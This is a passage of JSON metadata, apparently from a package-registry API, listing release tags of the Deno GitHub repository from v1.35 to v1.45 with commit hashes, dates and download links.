f6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":